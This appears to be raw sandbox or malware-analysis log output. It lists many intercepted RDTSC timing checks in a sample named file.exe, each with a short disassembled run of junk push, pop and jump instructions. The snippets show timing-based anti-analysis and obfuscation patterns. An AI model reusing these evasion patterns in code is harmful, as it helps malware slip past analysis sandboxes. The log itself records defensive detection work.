Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D9377 second address: 11D9388 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007EFF1080EDDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D9388 second address: 11D938F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D995D second address: 11D997A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFF1080EDDFh 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D997A second address: 11D99B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C22h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007EFF112B4C24h 0x00000011 jmp 00007EFF112B4C1Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DA1BC second address: 11DA1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DA1C0 second address: 11DA1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE48C second address: 11DE490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE490 second address: 11DE49F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFF112B4C16h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE49F second address: 11DE4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007EFF1080EDDDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DE4B4 second address: 11DE4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF112B4C24h 0x00000009 jmp 00007EFF112B4C1Ch 0x0000000e popad 0x0000000f popad 0x00000010 push ecx 0x00000011 jp 00007EFF112B4C2Dh 0x00000017 jmp 00007EFF112B4C27h 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD6E5 second address: 11DD6F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007EFF1080EDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DD6F0 second address: 11DD6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDDEB second address: 11DDDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDDF0 second address: 11DDE2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF112B4C2Ah 0x00000008 pushad 0x00000009 jbe 00007EFF112B4C16h 0x0000000f jmp 00007EFF112B4C29h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDFC2 second address: 11DDFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE2h 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007EFF1080EDD6h 0x00000011 jmp 00007EFF1080EDDEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11DDFEE second address: 11DDFF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11E2EC5 second address: 11E2EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 jmp 00007EFF1080EDE4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EC663 second address: 11EC674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EADD3 second address: 11EADD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EADD8 second address: 11EADEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007EFF112B4C16h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007EFF112B4C16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EB0D5 second address: 11EB0EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EB3CD second address: 11EB3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007EFF112B4C16h 0x0000000c jmp 00007EFF112B4C1Ch 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1B6F second address: 11F1B79 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF1080EDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200E99 second address: 1200E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200E9F second address: 1200EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200EA3 second address: 1200EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200EA9 second address: 1200EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007EFF1080EDD6h 0x00000010 jmp 00007EFF1080EDDEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1200EC7 second address: 1200ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1203895 second address: 12038B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 popad 0x00000016 jbe 00007EFF1080EDF4h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1213EC3 second address: 1213EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1218977 second address: 121897D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E44C second address: 121E46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF112B4C23h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007EFF112B4C16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E46F second address: 121E473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E473 second address: 121E479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E479 second address: 121E494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDE5h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E494 second address: 121E498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D053 second address: 121D071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFF1080EDE3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D071 second address: 121D075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D61F second address: 121D624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D624 second address: 121D62E instructions: 0x00000000 rdtsc 0x00000002 js 00007EFF112B4C1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12220CF second address: 12220F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDAh 0x00000007 jmp 00007EFF1080EDE7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12220F8 second address: 1222110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF112B4C24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222110 second address: 122211F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122211F second address: 1222127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1222127 second address: 122213E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFF1080EDDBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122213E second address: 1222150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007EFF112B4C16h 0x0000000c popad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233DF0 second address: 1233E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1246A9F second address: 1246AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFF112B4C16h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124694B second address: 124695E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007EFF1080EDD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124B097 second address: 124B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007EFF112B4C1Ch 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124AD35 second address: 124AD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124AD4F second address: 124AD9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007EFF112B4C16h 0x0000000d jng 00007EFF112B4C16h 0x00000013 pop ebx 0x00000014 jmp 00007EFF112B4C26h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007EFF112B4C1Ch 0x00000021 jmp 00007EFF112B4C24h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264586 second address: 126458C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263431 second address: 1263447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFF112B4C16h 0x0000000a jmp 00007EFF112B4C1Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263447 second address: 126344C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126344C second address: 1263452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263452 second address: 1263456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263578 second address: 1263584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFF112B4C16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12636CF second address: 12636E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFF1080EDD6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12636E1 second address: 12636E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12636E6 second address: 12636F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263EF8 second address: 1263F02 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFF112B4C22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263F02 second address: 1263F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFF1080EDD6h 0x0000000a jno 00007EFF1080EDDCh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007EFF1080EDE1h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1263F34 second address: 1263F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1264272 second address: 126428C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFF1080EDE1h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126428C second address: 1264294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12673B8 second address: 1267424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007EFF1080EDE7h 0x0000000f sub dh, 0000006Dh 0x00000012 push dword ptr [ebp+122D3461h] 0x00000018 jmp 00007EFF1080EDE8h 0x0000001d push E5CC42E9h 0x00000022 pushad 0x00000023 jmp 00007EFF1080EDE2h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126A43B second address: 126A44B instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF112B4C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126A44B second address: 126A44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126BF54 second address: 126BFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 jbe 00007EFF112B4C6Ah 0x0000000c pushad 0x0000000d jmp 00007EFF112B4C25h 0x00000012 jmp 00007EFF112B4C1Eh 0x00000017 jmp 00007EFF112B4C1Eh 0x0000001c jo 00007EFF112B4C16h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007EFF112B4C1Dh 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F01E9 second address: 51F01ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F01ED second address: 51F01F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F01F1 second address: 51F01F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F01F7 second address: 51F0238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007EFF112B4C20h 0x0000000f push eax 0x00000010 jmp 00007EFF112B4C1Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushad 0x00000018 mov ecx, 48E811E1h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F0238 second address: 51F029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushfd 0x00000007 jmp 00007EFF1080EDE3h 0x0000000c sub si, 218Eh 0x00000011 jmp 00007EFF1080EDE9h 0x00000016 popfd 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov eax, edx 0x0000001e pushad 0x0000001f mov dl, 9Bh 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007EFF1080EDE9h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F029B second address: 51F02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0012 second address: 51E0098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007EFF1080EDDEh 0x0000000b sbb si, CC98h 0x00000010 jmp 00007EFF1080EDDBh 0x00000015 popfd 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007EFF1080EDE9h 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov edx, eax 0x00000021 pushfd 0x00000022 jmp 00007EFF1080EDE8h 0x00000027 xor al, 00000058h 0x0000002a jmp 00007EFF1080EDDBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007EFF1080EDE5h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0098 second address: 51E00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF112B4C1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E00A8 second address: 51E00AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E00AC second address: 51E00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E00BB second address: 51E00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E00BF second address: 51E00D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E00D7 second address: 51E00E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210F1A second address: 5210F40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007EFF112B4C1Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5210F40 second address: 5210F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, E32Fh 0x00000009 popad 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007EFF1080EDE0h 0x00000012 xor eax, 3A95F458h 0x00000018 jmp 00007EFF1080EDDBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0118 second address: 51B011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B011C second address: 51B0122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0122 second address: 51B01BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, F09Dh 0x0000000f pushfd 0x00000010 jmp 00007EFF112B4C1Ah 0x00000015 adc ch, FFFFFFF8h 0x00000018 jmp 00007EFF112B4C1Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 mov ax, dx 0x00000024 mov si, di 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov dh, 19h 0x0000002c pushfd 0x0000002d jmp 00007EFF112B4C24h 0x00000032 and ax, E788h 0x00000037 jmp 00007EFF112B4C1Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 jmp 00007EFF112B4C26h 0x00000045 push dword ptr [ebp+04h] 0x00000048 jmp 00007EFF112B4C20h 0x0000004d push dword ptr [ebp+0Ch] 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 movzx esi, bx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B01BA second address: 51B01DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B01FC second address: 51B0200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
